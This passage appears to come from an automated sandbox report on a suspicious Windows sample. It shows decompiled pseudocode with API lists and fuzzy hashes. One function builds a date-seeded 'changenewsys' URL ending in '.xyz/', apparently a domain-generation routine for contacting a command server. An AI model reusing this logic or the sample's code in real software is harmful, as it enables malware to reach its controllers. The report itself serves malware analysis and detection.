                                                                                                                                                      				 *((intOrPtr*)(_t82 + 0x20)) = CreateBrushIndirect( &(_v100.lbColor));
                                                                                                                                                      				_v100.lbStyle = 0;
                                                                                                                                                      				_v100.lbColor.lbStyle = 0xc8c8c8;
                                                                                                                                                      				 *((intOrPtr*)(_t82 + 0x24)) = CreateBrushIndirect( &_v100);
                                                                                                                                                      				 *((intOrPtr*)(_t82 + 0xc)) = LoadBitmapA( *(_t82 + 4), 0x65);
                                                                                                                                                      				_t57 =  &_v88 + 0xc - 0x10;
                                                                                                                                                      				 *_t57 = 0xd657ec7b;
                                                                                                                                                      				 *((intOrPtr*)(_t57 + 4)) = _v88;
                                                                                                                                                      				 *((intOrPtr*)(_t57 + 8)) = _v84;
                                                                                                                                                      				 *((intOrPtr*)(_t57 + 0xc)) = _v80;
                                                                                                                                                      				_t58 = E00403570();
                                                                                                                                                      				 *(_t82 + 0x2c) = _t58;
                                                                                                                                                      				if(_t58 != 0) {
                                                                                                                                                      					 *((intOrPtr*)(_t82 + 0x30)) = E00403660(_t58);
                                                                                                                                                      					_t61 = E004036A0( *(_t82 + 0x2c), _t82 + 0x34);
                                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                                      					return _t61 & 0x000000fe;
                                                                                                                                                      				} else {
                                                                                                                                                      					return _t58 | 0xffffffff;
                                                                                                                                                      				}
                                                                                                                                                      			}





























                                                                                                                                                      0x004011fb
                                                                                                                                                      0x00401203
                                                                                                                                                      0x00401208
                                                                                                                                                      0x0040121a
                                                                                                                                                      0x00401225
                                                                                                                                                      0x00401236
                                                                                                                                                      0x00401240
                                                                                                                                                      0x0040120a
                                                                                                                                                      0x00401213
                                                                                                                                                      0x00401213

                                                                                                                                                      APIs
                                                                                                                                                      • CreateFontIndirectA.GDI32 ref: 0040115E
                                                                                                                                                      • CreateFontIndirectA.GDI32(00000007), ref: 00401191
                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 004011B1
                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004011CB
                                                                                                                                                      • LoadBitmapA.USER32 ref: 004011D6
                                                                                                                                                        • Part of subcall function 00403570: GetTickCount.KERNEL32 ref: 00403577
                                                                                                                                                        • Part of subcall function 00403570: SetupDiGetClassDevsA.SETUPAPI(?,00000000,00000000,00000012), ref: 00403593
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateIndirect$BrushFont$BitmapClassCountDevsLoadSetupTick
                                                                                                                                                      • String ID: 5$Arial
                                                                                                                                                      • API String ID: 1147224935-541822079
                                                                                                                                                      • Opcode ID: d60dfe3b84b4a58d9a5d83f059e2646c64ce9c7cc266f314e3cdc9e552848854
                                                                                                                                                      • Instruction ID: b55f597ceb39f0a81ff7d757ff3f92b208840d329d66038bf8bb08e1a96f4faf
                                                                                                                                                      • Opcode Fuzzy Hash: d60dfe3b84b4a58d9a5d83f059e2646c64ce9c7cc266f314e3cdc9e552848854
                                                                                                                                                      • Instruction Fuzzy Hash: 8A4149705087419FC310DF29C944A4BBBE4EF89328F008E2DE499A73A1E775E5098B9A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                      			E0040686B() {
                                                                                                                                                      				int _v4;
                                                                                                                                                      				int _v8;
                                                                                                                                                      				void* __ecx;
                                                                                                                                                      				intOrPtr _t7;
                                                                                                                                                      				CHAR* _t9;
                                                                                                                                                      				WCHAR* _t17;
                                                                                                                                                      				int _t20;
                                                                                                                                                      				char* _t24;
                                                                                                                                                      				int _t32;
                                                                                                                                                      				void* _t33;
                                                                                                                                                      				void* _t35;
                                                                                                                                                      				CHAR* _t37;
                                                                                                                                                      				WCHAR* _t39;
                                                                                                                                                      				void* _t40;
                                                                                                                                                      				int _t43;
                                                                                                                                                      
                                                                                                                                                      				_t7 =  *0x410980; // 0x0
                                                                                                                                                      				_t32 = 0;
                                                                                                                                                      				_t39 = 0;
                                                                                                                                                      				_t37 = 0;
                                                                                                                                                      				if(_t7 != 0) {
                                                                                                                                                      					if(_t7 != 1) {
                                                                                                                                                      						if(_t7 != 2) {
                                                                                                                                                      							L27:
                                                                                                                                                      							return 0;
                                                                                                                                                      						}
                                                                                                                                                      						L18:
                                                                                                                                                      						if(_t37 != _t32) {
                                                                                                                                                      							L20:
                                                                                                                                                      							_t9 = _t37;
                                                                                                                                                      							if( *_t37 == _t32) {
                                                                                                                                                      								L23:
                                                                                                                                                      								_t42 = _t9 - _t37 + 1;
                                                                                                                                                      								_t40 = E00403A89(_t33, _t9 - _t37 + 1);
                                                                                                                                                      								if(_t40 != _t32) {
                                                                                                                                                      									E00405F40(_t40, _t37, _t42);
                                                                                                                                                      								} else {
                                                                                                                                                      									_t40 = 0;
                                                                                                                                                      								}
                                                                                                                                                      								FreeEnvironmentStringsA(_t37);
                                                                                                                                                      								return _t40;
                                                                                                                                                      							} else {
                                                                                                                                                      								goto L21;
                                                                                                                                                      							}
                                                                                                                                                      							do {
                                                                                                                                                      								do {
                                                                                                                                                      									L21:
                                                                                                                                                      									_t9 =  &(_t9[1]);
                                                                                                                                                      								} while ( *_t9 != _t32);
                                                                                                                                                      								_t9 =  &(_t9[1]);
                                                                                                                                                      							} while ( *_t9 != _t32);
                                                                                                                                                      							goto L23;
                                                                                                                                                      						}
                                                                                                                                                      						_t37 = GetEnvironmentStrings();
                                                                                                                                                      						if(_t37 == _t32) {
                                                                                                                                                      							goto L27;
                                                                                                                                                      						}
                                                                                                                                                      						goto L20;
                                                                                                                                                      					}
                                                                                                                                                      					L6:
                                                                                                                                                      					if(_t39 != _t32) {
                                                                                                                                                      						L8:
                                                                                                                                                      						_t17 = _t39;
                                                                                                                                                      						if( *_t39 == _t32) {
                                                                                                                                                      							L11:
                                                                                                                                                      							_t20 = (_t17 - _t39 >> 1) + 1;
                                                                                                                                                      							_v4 = _t20;
                                                                                                                                                      							_t43 = WideCharToMultiByte(_t32, _t32, _t39, _t20, _t32, _t32, _t32, _t32);
                                                                                                                                                      							if(_t43 != _t32) {
                                                                                                                                                      								_t24 = E00403A89(_t33, _t43);
                                                                                                                                                      								_pop(_t35);
                                                                                                                                                      								_v8 = _t24;
                                                                                                                                                      								if(_t24 != _t32) {
                                                                                                                                                      									if(WideCharToMultiByte(_t32, _t32, _t39, _v4, _t24, _t43, _t32, _t32) == 0) {
                                                                                                                                                      										E004039A0(_t35, _v8);
                                                                                                                                                      										_v8 = _t32;
                                                                                                                                                      									}
                                                                                                                                                      									_t32 = _v8;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							FreeEnvironmentStringsW(_t39);
                                                                                                                                                      							return _t32;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L9;
                                                                                                                                                      						}
                                                                                                                                                      						do {
                                                                                                                                                      							do {
                                                                                                                                                      								L9:
                                                                                                                                                      								_t17 =  &(_t17[1]);
                                                                                                                                                      							} while ( *_t17 != _t32);
                                                                                                                                                      							_t17 =  &(_t17[1]);
                                                                                                                                                      						} while ( *_t17 != _t32);
                                                                                                                                                      						goto L11;
                                                                                                                                                      					}
                                                                                                                                                      					_t39 = GetEnvironmentStringsW();
                                                                                                                                                      					if(_t39 == _t32) {
                                                                                                                                                      						goto L27;
                                                                                                                                                      					}
                                                                                                                                                      					goto L8;
                                                                                                                                                      				}
                                                                                                                                                      				_t39 = GetEnvironmentStringsW();
                                                                                                                                                      				if(_t39 == 0) {
                                                                                                                                                      					_t37 = GetEnvironmentStrings();
                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                      						goto L27;
                                                                                                                                                      					}
                                                                                                                                                      					 *0x410980 = 2;
                                                                                                                                                      					goto L18;
                                                                                                                                                      				}
                                                                                                                                                      				 *0x410980 = 1;
                                                                                                                                                      				goto L6;
                                                                                                                                                      			}


















                                                                                                                                                      0x0040695f
                                                                                                                                                      0x00406963
                                                                                                                                                      0x00406964
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040695e
                                                                                                                                                      0x00406952
                                                                                                                                                      0x00406956
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406956
                                                                                                                                                      0x004068c2
                                                                                                                                                      0x004068c4
                                                                                                                                                      0x004068d2
                                                                                                                                                      0x004068d5
                                                                                                                                                      0x004068d7
                                                                                                                                                      0x004068e7
                                                                                                                                                      0x004068f3
                                                                                                                                                      0x004068fa
                                                                                                                                                      0x00406900
                                                                                                                                                      0x00406904
                                                                                                                                                      0x00406907
                                                                                                                                                      0x0040690e
                                                                                                                                                      0x0040690f
                                                                                                                                                      0x00406913
                                                                                                                                                      0x00406924
                                                                                                                                                      0x0040692a
                                                                                                                                                      0x00406930
                                                                                                                                                      0x00406930
                                                                                                                                                      0x00406934
                                                                                                                                                      0x00406934
                                                                                                                                                      0x00406913
                                                                                                                                                      0x00406939
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004068d9
                                                                                                                                                      0x004068d9
                                                                                                                                                      0x004068d9
                                                                                                                                                      0x004068da
                                                                                                                                                      0x004068db
                                                                                                                                                      0x004068e1
                                                                                                                                                      0x004068e2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004068d9
                                                                                                                                                      0x004068c8
                                                                                                                                                      0x004068cc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004068cc
                                                                                                                                                      0x00406888
                                                                                                                                                      0x0040688c
                                                                                                                                                      0x004068a0
                                                                                                                                                      0x004068a4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004068aa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004068aa
                                                                                                                                                      0x0040688e
                                                                                                                                                      0x00000000

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00406886
• GetEnvironmentStrings.KERNEL32 ref: 0040689A
• GetEnvironmentStringsW.KERNEL32 ref: 004068C6
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004068FE
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00406920
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00406939
• GetEnvironmentStrings.KERNEL32 ref: 0040694C
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040698A
Memory Dump Source
• Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
• Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
• Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
• Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
• Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
Similarity
• API ID: EnvironmentStrings$ByteCharFreeMultiWide
• String ID:
• API String ID: 1823725401-0
• Opcode ID: 339a8cec8eba2374dbba394ec5917f6ba435be108e2437be42f3420f26441754
• Instruction ID: cb2d569cf86d10741901bdab4dcf8e60e262cd169569d6f018d01fb75fa15f46
• Opcode Fuzzy Hash: 339a8cec8eba2374dbba394ec5917f6ba435be108e2437be42f3420f26441754
• Instruction Fuzzy Hash: E731F0F35052252EEB203FB85C8483BBADCE645758B16053FF583F3280E6399C6186AD
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 81%
E100225D0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
    char _v8;
    intOrPtr _v16;
    intOrPtr _v20;
    struct _SYSTEMTIME _v36;
    char _v303;
    char _v304;
    char _v332;
    char _v360;
    char _v388;
    signed int _v392;
    intOrPtr _v396;
    intOrPtr _v400;
    intOrPtr _v404;
    intOrPtr _v408;
    void* __ebp;
    intOrPtr _t91;

    _t97 = __eflags;
    _t89 = __edi;
    _push(0xffffffff);
    _push(E10022A77);
    _push( *[fs:0x0]);
     *[fs:0x0] = _t91;
    _v392 = 0;
    E10001160( &_v332, __eflags, "http://");
    _v8 = 0;
    _v304 = 0;
    E1000CF20(__edi,  &_v303, 0, 0x103);
    _v36.wYear = 0;
    _v36.wMonth = 0;
    _v36.wDay = 0;
    _v36.wMinute = 0;
    _v36.wMilliseconds = 0;
    GetLocalTime( &_v36);
    _push(_v36.wDay & 0x0000ffff);
    _push(_v36.wMonth & 0x0000ffff);
    E1000CC93(_t89,  &_v304, "changenewsys%04d%02d%02d", _v36.wYear & 0x0000ffff);
    _v20 = E1001A480(__ebx, _v36.wYear & 0x0000ffff, _t89, __esi, _t97,  &_v304);
    _v396 = E10001160( &_v360, _t97, _v20);
    _v400 = _v396;
    _v8 = 1;
    E10001A70( &_v332, _v400);
    _v8 = 0;
    E100011A0( &_v360);
    _push(_v20);
    E1000CA30(__ebx, _t89, __esi, _t97);
    _v404 = E10001160( &_v388, _t97, ".xyz/");
    _v408 = _v404;
    _v8 = 2;
    E10001A70( &_v332, _v408);
    _v8 = 0;
    E100011A0( &_v388);
    E10001110(_a4, _t97,  &_v332);
    _v392 = _v392 | 0x00000001;
    _v8 = 0xffffffff;
    E100011A0( &_v332);
     *[fs:0x0] = _v16;
    return _a4;
}



















                                                                                                                                                      0x10022705
                                                                                                                                                      0x1002270a
                                                                                                                                                      0x10022714
                                                                                                                                                      0x10022723
                                                                                                                                                      0x10022731
                                                                                                                                                      0x10022737
                                                                                                                                                      0x10022744
                                                                                                                                                      0x1002274f
                                                                                                                                                      0x10022759

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 10022624
                                                                                                                                                      • GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
                                                                                                                                                      • _sprintf.LIBCMT ref: 10022666
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                        • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastLocalTime___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID: .xyz/$changenewsys%04d%02d%02d$http://
                                                                                                                                                      • API String ID: 984892819-377150047
                                                                                                                                                      • Opcode ID: ae2ccc42162147e484f91380aeb397814b995b1e8bb40a03b6c619cd9c6de717
                                                                                                                                                      • Instruction ID: 81f1802f078645e924587200c16c269d37407c15be22a51fe8bac89201a43415
                                                                                                                                                      • Opcode Fuzzy Hash: ae2ccc42162147e484f91380aeb397814b995b1e8bb40a03b6c619cd9c6de717
                                                                                                                                                      • Instruction Fuzzy Hash: 08412975C04228ABDB14CBA4DC51BEEB7B4EF08744F4081E9F509A7291EB346B84CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 30%
                                                                                                                                                      			E00403570(char _a4) {
                                                                                                                                                      				char _v12;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				char _v64;
                                                                                                                                                      				char _v72;
                                                                                                                                                      				char _v88;
                                                                                                                                                      				char _v92;
                                                                                                                                                      				intOrPtr _v96;
                                                                                                                                                      				signed int _t12;
                                                                                                                                                      				char* _t15;
                                                                                                                                                      				void* _t26;
                                                                                                                                                      				intOrPtr* _t27;
                                                                                                                                                      				char* _t34;
                                                                                                                                                      				void* _t35;
                                                                                                                                                      				intOrPtr* _t37;
                                                                                                                                                      
                                                                                                                                                      				_t26 = 0;
                                                                                                                                                      				_t12 = GetTickCount();
                                                                                                                                                      				 *0x40d5e4 = _t12 *  *0x40d5e4 + 1;
                                                                                                                                                      				_t15 =  &_a4;
                                                                                                                                                      				__imp__SetupDiGetClassDevsA(_t15, 0, 0, 0x12);
                                                                                                                                                      				_t34 = _t15;
                                                                                                                                                      				if(_t34 != 0xffffffff) {
                                                                                                                                                      					_v44 = 0x1c;
                                                                                                                                                      					__imp__SetupDiEnumDeviceInterfaces(_t34, 0,  &_v12, 0,  &_v44, _t35);
                                                                                                                                                      					if(_t15 != 0) {
                                                                                                                                                      						_t27 = __imp__SetupDiGetDeviceInterfaceDetailA;
                                                                                                                                                      						 *_t27(_t34,  &_v64, 0, 0,  &_v72, 0);
                                                                                                                                                      						_t37 = E00403A89( &_v64, _v96);
                                                                                                                                                      						 *_t37 = 5;
                                                                                                                                                      						_t30 = _v96;
                                                                                                                                                      						 *_t27(_t34,  &_v88, _t37, _v96,  &_v92, 0);
                                                                                                                                                      						_t11 = _t37 + 4; // 0x4
                                                                                                                                                      						_t26 = CreateFileA(_t11, 0xc0000000, 1, 0, 3, 0x800, 0);
                                                                                                                                                      						if(_t37 != 0) {
                                                                                                                                                      							E004039A0(_t30, _t37);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					__imp__SetupDiDestroyDeviceInfoList(_t34);
                                                                                                                                                      					return _t26;
                                                                                                                                                      				} else {
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}


















                                                                                                                                                      APIs
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403577
                                                                                                                                                      • SetupDiGetClassDevsA.SETUPAPI(?,00000000,00000000,00000012), ref: 00403593
                                                                                                                                                      • SetupDiEnumDeviceInterfaces.SETUPAPI ref: 004035C0
                                                                                                                                                      • SetupDiGetDeviceInterfaceDetailA.SETUPAPI(00000000,?,00000000,00000000,00000000,00000000), ref: 004035E1
                                                                                                                                                      • SetupDiGetDeviceInterfaceDetailA.SETUPAPI(00000000,?,00000000,?,?,00000000), ref: 0040360B
                                                                                                                                                      • CreateFileA.KERNEL32(00000004,C0000000,00000001,00000000,00000003,00000800,00000000,?,?,?,?,?,?,?,?,00401200), ref: 00403623
                                                                                                                                                      • SetupDiDestroyDeviceInfoList.SETUPAPI(00000000), ref: 00403639
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Setup$Device$DetailInterface$ClassCountCreateDestroyDevsEnumFileInfoInterfacesListTick
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 280619443-0
                                                                                                                                                      • Opcode ID: 82c272d572808aedcab37959c7018c9105322b92b1be9a593f462cfc53fd61eb
                                                                                                                                                      • Instruction ID: 2111d22678be0be0e8fa47b01a7fb7e7f4be4bb325cb1ef0c0c3e92b1a604571
                                                                                                                                                      • Opcode Fuzzy Hash: 82c272d572808aedcab37959c7018c9105322b92b1be9a593f462cfc53fd61eb
                                                                                                                                                      • Instruction Fuzzy Hash: CA2183716403007FE3109F50DD85FAB77ACEB84754F50453DFA45AA2D0E7B8E90987AA
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                      			E004090EB(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
                                                                                                                                                      				int _v8;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				short* _v28;
                                                                                                                                                      				short _v32;
                                                                                                                                                      				int _v36;
                                                                                                                                                      				short* _v40;
                                                                                                                                                      				void* _v56;
                                                                                                                                                      				int _t31;
                                                                                                                                                      				int _t32;
                                                                                                                                                      				int _t37;
                                                                                                                                                      				int _t43;
                                                                                                                                                      				int _t44;
                                                                                                                                                      				int _t45;
                                                                                                                                                      				void* _t53;
                                                                                                                                                      				short* _t60;
                                                                                                                                                      				int _t61;
                                                                                                                                                      				intOrPtr _t62;
                                                                                                                                                      				short* _t63;
                                                                                                                                                      
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(0x40b760);
                                                                                                                                                      				_push(E00405E4C);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t62;
                                                                                                                                                      				_t63 = _t62 - 0x18;
                                                                                                                                                      				_v28 = _t63;
                                                                                                                                                      				_t31 =  *0x410a18; // 0x0
                                                                                                                                                      				if(_t31 != 0) {
                                                                                                                                                      					L6:
                                                                                                                                                      					if(_t31 != 2) {
                                                                                                                                                      						if(_t31 != 1) {
                                                                                                                                                      							goto L18;
                                                                                                                                                      						} else {
                                                                                                                                                      							if(_a20 == 0) {
                                                                                                                                                      								_t44 =  *0x410818; // 0x0
                                                                                                                                                      								_a20 = _t44;
                                                                                                                                                      							}
                                                                                                                                                      							asm("sbb eax, eax");
                                                                                                                                                      							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
                                                                                                                                                      							_v36 = _t37;
                                                                                                                                                      							if(_t37 == 0) {
                                                                                                                                                      								goto L18;
                                                                                                                                                      							} else {
                                                                                                                                                      								_v8 = 0;
                                                                                                                                                      								E004038A0(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
                                                                                                                                                      								_v28 = _t63;
                                                                                                                                                      								_t60 = _t63;
                                                                                                                                                      								_v40 = _t60;
                                                                                                                                                      								E00407CC0(_t60, 0, _t37 + _t37);
                                                                                                                                                      								_v8 = _v8 | 0xffffffff;
                                                                                                                                                      								if(_t60 == 0) {
                                                                                                                                                      									goto L18;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
                                                                                                                                                      									if(_t43 == 0) {
                                                                                                                                                      										goto L18;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t45 = _a24;
                                                                                                                                                      						if(_t45 == 0) {
                                                                                                                                                      							_t45 =  *0x410808; // 0x0
                                                                                                                                                      						}
                                                                                                                                                      						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					_push( &_v32);
                                                                                                                                                      					_t61 = 1;
                                                                                                                                                      					if(GetStringTypeW(_t61, 0x40b6e8, _t61, ??) == 0) {
                                                                                                                                                      						if(GetStringTypeA(0, _t61, 0x40b6e4, _t61,  &_v32) == 0) {
                                                                                                                                                      							L18:
                                                                                                                                                      							_t32 = 0;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t31 = 2;
                                                                                                                                                      							goto L5;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t31 = _t61;
                                                                                                                                                      						L5:
                                                                                                                                                      						 *0x410a18 = _t31;
                                                                                                                                                      						goto L6;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				 *[fs:0x0] = _v20;
                                                                                                                                                      				return _t32;
                                                                                                                                                      			}






















                                                                                                                                                      APIs
                                                                                                                                                      • GetStringTypeW.KERNEL32(00000001,0040B6E8,00000001,00000000,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0040912A
                                                                                                                                                      • GetStringTypeA.KERNEL32(00000000,00000001,0040B6E4,00000001,00000000,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409144
                                                                                                                                                      • GetStringTypeA.KERNEL32(00000000,00000000,?,00000100,00000020,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409178
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000101,?,00000100,00000000,00000000,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 004091B0
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000100,?,00000100,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409206
                                                                                                                                                      • GetStringTypeW.KERNEL32(00000000,?,00000000,00000020,?,00000100,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409218
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: StringType$ByteCharMultiWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3852931651-0
                                                                                                                                                      • Opcode ID: 04c946430f380f41b092c234e871969b9f2bcbd970ef16b0294540a403549ed5
                                                                                                                                                      • Instruction ID: 9475de8012dced2f5ac8a1150185371de60179b956b0b8ca1f619be50ce79b23
                                                                                                                                                      • Opcode Fuzzy Hash: 04c946430f380f41b092c234e871969b9f2bcbd970ef16b0294540a403549ed5
                                                                                                                                                      • Instruction Fuzzy Hash: A7415B72A4020AFFDB109F94DC89EEF7B68EB09750F10493AF911A6291C3399D518BD9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E004012C0(struct HDC__* _a4, void* _a12) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				int _v12;
                                                                                                                                                      				int _v16;
                                                                                                                                                      				void _v36;
                                                                                                                                                      				int _v40;
                                                                                                                                                      				int _v44;
                                                                                                                                                      				void* _v56;
                                                                                                                                                      				struct HDC__* _t10;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				struct HDC__* _t23;
                                                                                                                                                      				struct HDC__* _t24;
                                                                                                                                                      
                                                                                                                                                      				_t23 = _a4;
                                                                                                                                                      				_t10 = CreateCompatibleDC(_t23);
                                                                                                                                                      				_t18 = _a12;
                                                                                                                                                      				_t24 = _t10;
                                                                                                                                                      				_v8 = SelectObject(_t24, _t18);
                                                                                                                                                      				GetObjectA(_t18, 0x18,  &_v36);
